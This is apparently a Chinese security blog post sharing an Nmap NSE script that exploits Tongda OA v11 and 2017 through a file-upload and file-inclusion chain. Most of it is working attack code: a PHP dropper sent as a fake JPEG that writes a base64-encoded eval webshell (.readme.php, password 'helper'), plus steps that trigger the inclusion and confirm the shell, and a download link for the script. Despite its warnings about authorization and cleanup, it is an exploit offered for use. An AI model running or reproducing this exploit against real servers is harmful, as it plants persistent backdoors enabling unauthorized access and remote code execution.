通达OA文件包含全版本 getshell | Nmap 脚本

时间:2022-07-23

昨天写的脚本仅针对 v11 版本;此次漏洞涉及的版本较多,包括:

  • v11
  • 2017
  • 2016
  • 2015
  • 2013 增强版
  • 2013

今天做了全版本匹配,但我发现似乎只有 v11 和 2017 版本存在文件包含漏洞;文件上传在各版本都存在,但上传目录不在 Web 目录(webroot)下,无法直接访问,因此单独的上传拿不到 shell。所以今天更新了一下 2017 版本的利用,顺便改了一下 result 的值,并修正了拼错的 nothing。需要注意:脚本输出 "not vulnerable" 只表示"包含 + webshell 访问"这一步没有成功,上传本身可能已经成功并在目标上留下了文件;而输出 "vulnerable" 时目标上已经被写入了 .readme.php,脚本不会自动清理。

local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local string = require "string"
local base64 = require "base64"

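-- NSE metadata. This script uploads a dropper and plants a PHP webshell on the
-- target, so it belongs in "intrusive" and must NOT be in "default": scripts in
-- the default category run on every -sC / -A scan, which would write a webshell
-- to every matching host without the operator ever selecting this script.
description = "TDOA v11.3 & v2017 | upload & lfi"
author = "test94"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}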

---
-- Intrusive check for the Tongda OA upload + file-inclusion chain: uploads a
-- PHP dropper via /ispirit/im/upload.php, includes it through gateway.php and
-- reports the resulting webshell. On a vulnerable host this LEAVES a webshell
-- (.readme.php) on the target and does not remove it; clean up afterwards and
-- only run it against systems you are authorized to test.
--
-- @usage
-- nmap <target> -p8080 -Pn --script tdoa --scan-delay 1000ms
--
-- @output
-- PORT     STATE SERVICE
-- 8080/tcp open  http-proxy
-- | tdoa:
-- |   result: vulnerable
-- |   webshell: 192.168.1.48:8080/ispirit/interface/.readme.php
-- |_  webshell_pass: helper

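--- Pre-scan banner. NSE scripts must not write to stdout directly: `print`
-- bypasses Nmap's output layer and corrupts machine-readable output (-oX/-oG),
-- so the banner goes through stdnse.verbose1 (shown with -v). The function
-- returns nothing, so no prerule action is scheduled; hosts are handled by
-- `portrule` / `action`.
prerule = function()
    stdnse.verbose1("[+] TongdaOA upload & lfi Detecting ... ")
    stdnse.verbose1("[-] (if port is filtered, nothing will be checked)")
end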

--- Run `action` on any port whose detected service name is in the list below.
-- NOTE(review): "afs3-callback" is an unusual entry for a web application;
-- presumably Nmap's service detection labels some Tongda OA ports that way —
-- confirm with -sV against a known instance.
local web_service_names = {"http", "https", "afs3-callback", "http-proxy"}
portrule = shortport.service(web_service_names)

-- Multipart body for the dropper upload (POSTed to /ispirit/im/upload.php by
-- `action`). Notes for anyone editing it:
--  * The boundary "----WebKitFormBoundary" must match the boundary in the
--    Content-Type header that `action` sends. Each part is introduced by
--    "--" .. boundary, which is why these lines start with six dashes, and
--    the closing delimiter carries a trailing "--".
--  * Lines are separated by bare LF (Lua long string); RFC 2046 multipart
--    requires CRLF. The target's parser evidently tolerates LF, but a stricter
--    parser or a reverse proxy in front of it may reject the body — check this
--    first if uploads start failing.
--  * The ATTACHMENT part is PHP source sent as image/jpeg. When the stored
--    file is later included by gateway.php it writes ".readme.php" relative
--    to the including script's working directory (which is why `action`
--    reports the shell next to gateway.php) with the base64 blob below as its
--    content. The blob is not decoded on this page; treat it as a webshell.
--    That file persists on the target after the scan — nothing cleans it up.
--  * The meaning of UPLOAD_MODE / P / DEST_UID (all "1") is not established
--    by this file — TODO confirm against the upload handler before changing.
local postdatas = [[
------WebKitFormBoundary
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundary
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$fp = fopen('.readme.php', 'w');
$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ2hlbHBlciddKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bJ2snXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWydrJ107CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoJ3wnLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4=");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundary--
]]

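--- Upload the dropper, pick the gateway endpoint for the installed version,
-- trigger the inclusion and check whether the dropped webshell is served.
--
-- WARNING: on a vulnerable host this leaves ".readme.php" (a PHP webshell, see
-- `postdatas`) on the target and performs no cleanup. Use only against systems
-- you are authorized to test, and remove the file afterwards.
--
-- Flow (each step bails out with result "not vulnerable" when it fails,
-- logging the reason at debug level 1 instead of raising — the original
-- crashed with a nil index / nil concatenation on any unreachable host,
-- rejected upload, or unsupported version):
--   1. POST `postdatas` to /ispirit/im/upload.php and read the stored
--      attachment reference back from the response ("@<dir>_<id>|...").
--   2. GET both known gateway.php locations; the first that answers 200
--      decides the include URL and the webshell path.
--   3. GET the include URL (runs the dropper), then GET the webshell path;
--      a 200 on the latter is reported as vulnerable.
--
-- @param host NSE host table; host.ip is used in the reported webshell URL.
-- @param port NSE port table; port.number is used in the reported webshell URL.
-- @return stdnse output table with `result`, plus `webshell` and
--         `webshell_pass` when the dropped shell answered.
action = function(host, port)
    local output = stdnse.output_table()
    output.result = "not vulnerable"

    local headers = {
        ["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.0 Safari/537.36",
        ["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        ["Accept-Encoding"] = "gzip, deflate",
        ["Accept-Language"] = "en-US,en;q=0.5",
        ["Connection"] = "keep-alive",
        -- header values are strings; the original passed the number 1
        ["Upgrade-Insecure-Requests"] = "1",
    }

    -- Step 1: upload. The boundary here must match the one used in `postdatas`.
    local upload_headers = {}
    for name, value in pairs(headers) do upload_headers[name] = value end
    upload_headers["Content-Type"] = "multipart/form-data; boundary=----WebKitFormBoundary"
    local upload_resp = http.post(host, port, "/ispirit/im/upload.php",
                                  { header = upload_headers, content = postdatas })
    if not upload_resp or not upload_resp.body then
        stdnse.debug1("POST /ispirit/im/upload.php failed (no response body)")
        return output
    end

    -- The upload handler echoes the stored file as "@<dir>_<id>|...". The
    -- original hard-coded <dir> as 2003 both in the pattern and in the include
    -- path; capture whatever the server reports instead (it looks like a
    -- date-based directory name — TODO confirm against the handler) so the
    -- same chain works when the directory differs, and bail out when absent.
    local attach_dir, attach_id = string.match(upload_resp.body, "@(%d+)_(.-)%|")
    if not attach_dir then
        stdnse.debug1("no attachment reference in upload response; upload rejected?")
        return output
    end
    local attach_path = string.format("//general/../../attach/im/%s/%s.jpg", attach_dir, attach_id)

    -- Step 2: locate gateway.php. GETs carry no body, so no Content-Type is sent.
    local get_options = { header = headers }
    local probes = http.pipeline_add("/ispirit/interface/gateway.php", get_options, nil, "GET")
    probes = http.pipeline_add("/mac/gateway.php", get_options, probes, "GET")
    local probe_resp = http.pipeline_go(host, port, probes)
    if not probe_resp then
        stdnse.debug1("gateway.php probe pipeline failed")
        return output
    end

    local include_url, webshell_path
    if probe_resp[1] and probe_resp[1].status == 200 then
        -- v11 layout
        include_url = '/ispirit/interface/gateway.php?json={"url":"' .. attach_path .. '"}'
        webshell_path = "/ispirit/interface/.readme.php"
    elseif probe_resp[2] and probe_resp[2].status == 200 then
        -- 2017 layout
        include_url = '/mac/gateway.php?json={"url":"' .. attach_path .. '"}'
        webshell_path = "/mac/.readme.php"
    else
        stdnse.debug1("no gateway.php endpoint answered 200; version not supported")
        return output
    end

    -- Step 3: trigger the inclusion, then fetch the dropped file. The include
    -- URL is sent unencoded (braces and quotes in the query string), exactly
    -- as the original did; the target accepted it, a stricter front end may not.
    -- Only the second response (the webshell GET) decides the verdict.
    local trigger = http.pipeline_add(include_url, get_options, nil, "GET")
    trigger = http.pipeline_add(webshell_path, get_options, trigger, "GET")
    local trigger_resp = http.pipeline_go(host, port, trigger)
    if trigger_resp and trigger_resp[2] and trigger_resp[2].status == 200 then
        output.result = "vulnerable"
        output.webshell = string.format("%s:%d%s", host.ip, port.number, webshell_path)
        -- value reported by the original script; its meaning depends on the
        -- dropped payload (base64 in `postdatas`), which is not decoded here
        output.webshell_pass = "helper"
    end
    return output
end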

参考文章

https://github.com/jas502n/OA-tongda-RCE

脚本下载地址(个人 NAS 分享链接,非官方来源;下载后请先核对脚本内容与本文一致再运行。再次提醒:该脚本会在目标上写入 webshell 且不会自动清理,仅可用于已获授权的测试):

http://www.my-synology.cn:37980/sharing/TadkxqVi6

密码: helper